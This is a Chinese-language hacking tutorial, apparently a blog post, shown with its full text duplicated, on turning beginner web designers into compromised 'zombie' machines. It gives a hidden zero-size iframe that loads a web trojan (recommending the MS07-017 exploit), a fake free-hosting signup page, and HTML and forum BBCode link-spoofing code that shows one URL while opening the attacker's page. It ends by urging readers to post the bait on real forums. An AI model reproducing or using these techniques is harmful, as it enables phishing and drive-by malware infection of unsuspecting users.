文章作者:冷月孤枫
备注:QQ:89224874 个人主页:http:fk.3355.cn
兵法有云:知己知彼,百战不殆。同样我们抓肉鸡也要这样,首先我们应确立这次的目标“刚刚学习网页制作的爱好者,对于免费空间无限的渴望者”。这次我们的工作主要放在页面的伪造上,加上恰当的衔接,使其看不出任何不一样。主要用到“网络钓鱼”、“url欺骗”……
注:本文牵涉到的与主题无关的知识均忽略,如读者感兴趣可以到我的博客上讨论
之一---打造利器
1.先伪造一个免费空间申请页面,看下面的两幅图
图1
图2
有什么区别吗?哈哈,对了就是在地址上的图2是我伪造出的页面,我们还要改一下这一页面的一些参数就是在用户点击“我同意”要进入的是真正的注册页面,这样做的目的就是欺骗点击者,也就是说整个过程我们就更换了一个页面,如果你是html的高手还可以在我同意后加上时间,比如规定10秒后才能点击,方法就不说了,有兴趣的朋友可以到博客上讨论。然后我们在这个页面上挂马,具体的方法大家去网上找,这里只给出一种:<iframe src="http://192.168.1.1/muma.htm" width="0" height="0" frameborder="0"></iframe>,把地址改为你的网页木马的地址就可以了,推荐哟个ms07017的那个漏洞。
我们姑且把这个页面命名为reg.asp,之后我们把它传到支持asp的服务器上,这里假设为http://fk.3355.cn/reg.asp
之二---欺骗中的欺骗
1.编写自己的免费空间宣传文章,下面是我从网上复制下来的,我们来改一下(因为是教程,所以以我的博客:枫客 http://fk.3355.cn 为例,当然大家改的时候要找真是的免费空间,这样才能是目标不容易立刻发现)
枫客免费空间提供50M全能免费空间
枫客免费空间提供50M全能免费空间,支持绑定域名,支持动易,数字人,动网,乔客等组件,支持url,html静态..! 有控制面版
可以自定义400、500错误 、默认IP访问权限等等.
空间参数:
磁盘空间: 30M---1000M
域名绑定: 2个
相关域名:自备
主机系统: win2003
脚本支持: Default.htm,Index.html,Index.htm,Default.asp,Index.asp,Default.php,Index.php
数 据 库: access,MYsql ,MS SQL
FTP管理: 1个
控制面版:有
申请地址: http://fk.3355.cn/ ;
每天限额50人。
申请流程:
1.到 http://fk.3355.cn/register.asp申请帐户。
2.申请ID成功,登陆,填写开通虚拟主机资料。
3.如果想得到更大的空间可以到论坛发贴,宣传贴,推广。
4.宣传贴就是本贴。
5.免费空间用户开通空间后7天内上传,未及时上传的在不通知的情况下一律关闭6.有问题到空间交流专栏发主题贴说明情况!!!!!!!
申请地址: http://fk.3355.cn/register.asp
大家看我发到论坛上的效果(图3)
但是当我的鼠标放在申请地址的上面时(图4)
,状态栏显示的是
http://fk.3355.cn/register.asp,这样点击就会访真实的页面,但是我想让它既显示
http://fk.3355.cn/register.asp,并且在状态栏里页显示
http://fk.3355.cn/register.asp,而实际访问的确实我自己伪造的页面的目的,应该怎么做那,就是url欺骗了
大家看下面一段代码:
<p><a id="lygf" href="http://fk.3355.cn/reg.asp"></a></p>
<div>
<a href="http://fk.3355.cn/register.asp" target="_blank">
<table>
<caption>
<label for="lygf">
<u style="cursor: pointer; color: blue">
http://fk.3355.cn/register.asp
</u>
</label>
</caption>
</table>
</a>
</div>
把这段代码报存为htm就能实现我们上面所说的了,网页上显示的和状态栏显示的都是 http://fk.3355.cn/register.asp,但是点击后就会访问 http://fk.3355.cn/reg.asp,主要是利用了html的<caption>、<label>、<u>标签的功能。
这样我们的宣传文章的申请地址后就加入这段代码发到论坛中去(以测试成功)
DZ论坛(需要支持html):按照下图发图5
,如果你所在的论坛不支持html就用dz代码欺骗,如下[xurl=http://fk.3355.cn/reg.asp][xcolor=blue]http://fk.3355.cn/register.asp[/color][/url]只是在状态栏显示还是
http://fk.3355.cn/reg.asp。所以最好找支持html的论坛
之三---我的欺骗肉鸡
现在万事具备,只欠东风,自己动手到各大论坛发宣传帖吧,也可以到网页技术的专业性论坛去发帖(试着在百度里搜“网页技术”),只要他们点击就中招。
文章匆匆写过,其实就是欺骗,欺骗再欺骗,现在免费空间的宣传帖在网上之多,我们这个绝对可以掩人耳目,但愿你能如愿
备注:QQ:89224874 个人主页:http:fk.3355.cn
兵法有云:知己知彼,百战不殆。同样我们抓肉鸡也要这样,首先我们应确立这次的目标“刚刚学习网页制作的爱好者,对于免费空间无限的渴望者”。这次我们的工作主要放在页面的伪造上,加上恰当的衔接,使其看不出任何不一样。主要用到“网络钓鱼”、“url欺骗”……
注:本文牵涉到的与主题无关的知识均忽略,如读者感兴趣可以到我的博客上讨论
之一---打造利器
1.先伪造一个免费空间申请页面,看下面的两幅图
图1
图2
有什么区别吗?哈哈,对了就是在地址上的图2是我伪造出的页面,我们还要改一下这一页面的一些参数就是在用户点击“我同意”要进入的是真正的注册页面,这样做的目的就是欺骗点击者,也就是说整个过程我们就更换了一个页面,如果你是html的高手还可以在我同意后加上时间,比如规定10秒后才能点击,方法就不说了,有兴趣的朋友可以到博客上讨论。然后我们在这个页面上挂马,具体的方法大家去网上找,这里只给出一种:<iframe src="http://192.168.1.1/muma.htm" width="0" height="0" frameborder="0"></iframe>,把地址改为你的网页木马的地址就可以了,推荐哟个ms07017的那个漏洞。
我们姑且把这个页面命名为reg.asp,之后我们把它传到支持asp的服务器上,这里假设为http://fk.3355.cn/reg.asp
之二---欺骗中的欺骗
1.编写自己的免费空间宣传文章,下面是我从网上复制下来的,我们来改一下(因为是教程,所以以我的博客:枫客 http://fk.3355.cn 为例,当然大家改的时候要找真是的免费空间,这样才能是目标不容易立刻发现)
枫客免费空间提供50M全能免费空间
枫客免费空间提供50M全能免费空间,支持绑定域名,支持动易,数字人,动网,乔客等组件,支持url,html静态..! 有控制面版
可以自定义400、500错误 、默认IP访问权限等等.
空间参数:
磁盘空间: 30M---1000M
域名绑定: 2个
相关域名:自备
主机系统: win2003
脚本支持: Default.htm,Index.html,Index.htm,Default.asp,Index.asp,Default.php,Index.php
数 据 库: access,MYsql ,MS SQL
FTP管理: 1个
控制面版:有
申请地址: http://fk.3355.cn/ ;
每天限额50人。
申请流程:
1.到 http://fk.3355.cn/register.asp申请帐户。
2.申请ID成功,登陆,填写开通虚拟主机资料。
3.如果想得到更大的空间可以到论坛发贴,宣传贴,推广。
4.宣传贴就是本贴。
5.免费空间用户开通空间后7天内上传,未及时上传的在不通知的情况下一律关闭6.有问题到空间交流专栏发主题贴说明情况!!!!!!!
申请地址: http://fk.3355.cn/register.asp
大家看我发到论坛上的效果(图3)
但是当我的鼠标放在申请地址的上面时(图4)
,状态栏显示的是
http://fk.3355.cn/register.asp,这样点击就会访真实的页面,但是我想让它既显示
http://fk.3355.cn/register.asp,并且在状态栏里页显示
http://fk.3355.cn/register.asp,而实际访问的确实我自己伪造的页面的目的,应该怎么做那,就是url欺骗了
大家看下面一段代码:
<p><a id="lygf" href="http://fk.3355.cn/reg.asp"></a></p>
<div>
<a href="http://fk.3355.cn/register.asp" target="_blank">
<table>
<caption>
<label for="lygf">
<u style="cursor: pointer; color: blue">
http://fk.3355.cn/register.asp
</u>
</label>
</caption>
</table>
</a>
</div>
把这段代码报存为htm就能实现我们上面所说的了,网页上显示的和状态栏显示的都是 http://fk.3355.cn/register.asp,但是点击后就会访问 http://fk.3355.cn/reg.asp,主要是利用了html的<caption>、<label>、<u>标签的功能。
这样我们的宣传文章的申请地址后就加入这段代码发到论坛中去(以测试成功)
DZ论坛(需要支持html):按照下图发图5
,如果你所在的论坛不支持html就用dz代码欺骗,如下[xurl=http://fk.3355.cn/reg.asp][xcolor=blue]http://fk.3355.cn/register.asp[/color][/url]只是在状态栏显示还是
http://fk.3355.cn/reg.asp。所以最好找支持html的论坛
之三---我的欺骗肉鸡
现在万事具备,只欠东风,自己动手到各大论坛发宣传帖吧,也可以到网页技术的专业性论坛去发帖(试着在百度里搜“网页技术”),只要他们点击就中招。
文章匆匆写过,其实就是欺骗,欺骗再欺骗,现在免费空间的宣传帖在网上之多,我们这个绝对可以掩人耳目,但愿你能如愿
3675
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
